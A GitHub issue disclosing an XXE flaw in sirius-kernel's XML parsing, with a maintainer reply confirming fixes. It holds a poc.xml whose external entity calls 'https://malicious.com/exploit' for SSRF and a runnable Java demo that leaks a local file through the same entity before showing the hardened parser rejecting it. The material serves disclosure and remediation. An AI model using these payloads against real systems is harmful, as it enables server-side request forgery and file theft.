Hi team, there might be a potential XXE vulnerability but I'm not sure whether it's an actual risk or not, just creating an issue here for you to check.

On https://github.com/scireum/sirius-kernel/blob/develop/src/main/java/sirius/kernel/xml/XMLStructuredInput.java#L38, function XMLStructuredInput()

An external XML is parsed with DocumentBuilder without security settings enabled:

```java
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
if (namespaceContext != null) {
    factory.setNamespaceAware(true);
}
DocumentBuilder builder = factory.newDocumentBuilder();
Document document = builder.parse(inputStream);
```

A malicious XML as input could be used to exploit the vulnerability. For example they could craft a poc.xml like this:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://malicious.com/exploit">]>
<root>&xxe;</root>
```

to trigger an SSRF.

Attackers can also exploit this vulnerability to access sensitive files on the system, overload the system with malicious XML payloads and so on.

Fix recommendation would be using the following functions to disable DTD or external entities:

```java
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
```

Or

```java
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
```
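As an added, stand-alone example (not code from sirius-kernel and not part of the reporter's issue), the following Java program builds the reporter's PoC against a constructed temporary file instead of a remote URL so that it runs offline, parses it once with a DocumentBuilderFactory configured like the reported snippet and once with the recommended hardening features (plus the JAXP 1.5 accessExternalDTD/accessExternalSchema attributes, XInclude off and entity expansion off, which are belt-and-braces in case DOCTYPE is ever re-enabled), and prints the leaked file content from the first parse and the rejection from the second. The class and method names are chosen for the example; it assumes the JDK's built-in Xerces parser, on which these feature and attribute names are supported.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

public class XxeDemo {

    /** Same shape as the reported snippet: no hardening features set on the factory. */
    static Document parseUnhardened(byte[] xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setNamespaceAware(true);
        DocumentBuilder builder = factory.newDocumentBuilder();
        return builder.parse(new ByteArrayInputStream(xml));
    }

    /** Hardened: reject any DOCTYPE, and additionally switch off every path that resolves external content. */
    static Document parseHardened(byte[] xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setNamespaceAware(true);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Primary control: a document with a DOCTYPE is refused before any entity is declared.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth, relevant only if disallow-doctype-decl is ever relaxed.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        // JAXP 1.5 (JDK 7u40+/8+): an empty protocol list means no external DTD/schema may be fetched.
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return factory.newDocumentBuilder().parse(new ByteArrayInputStream(xml));
    }

    public static void main(String[] args) throws Exception {
        // Constructed stand-in for a sensitive file such as /etc/passwd, so the demo needs no network.
        Path secret = Files.createTempFile("xxe-demo-", ".txt");
        Files.write(secret, "TOP-SECRET".getBytes(StandardCharsets.UTF_8));
        try {
            // Same structure as the reported poc.xml, with a file:// SYSTEM identifier instead of https://.
            String poc = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                    + "<!DOCTYPE root [<!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">]>\n"
                    + "<root>&xxe;</root>";
            byte[] xml = poc.getBytes(StandardCharsets.UTF_8);

            // Unhardened: the entity is resolved and the file content lands in the DOM.
            Document leaked = parseUnhardened(xml);
            System.out.println("unhardened: root text = " + leaked.getDocumentElement().getTextContent());

            // Hardened: the parser stops at the DOCTYPE and never touches the SYSTEM identifier.
            try {
                parseHardened(xml);
                System.out.println("hardened: parsed (unexpected)");
            } catch (SAXException e) {
                System.out.println("hardened: rejected: " + e.getMessage());
            }
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Compile and run with `javac XxeDemo.java && java XxeDemo`. Swapping the SYSTEM identifier back to the `https://malicious.com/exploit` URL from the report turns the local file read into the SSRF the report describes: the unhardened builder performs the outbound request when `&xxe;` is referenced in the body, while the hardened builder fails on the DOCTYPE declaration before resolving anything.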
Hi @JAckLosingHeart - thanks for your report. We checked it and also checked other possible vulnerable implementations.
Fix is available in #543 and also scireum/sirius-web#1488. If you have any comments or see ongoing issues, feel free to contact us again.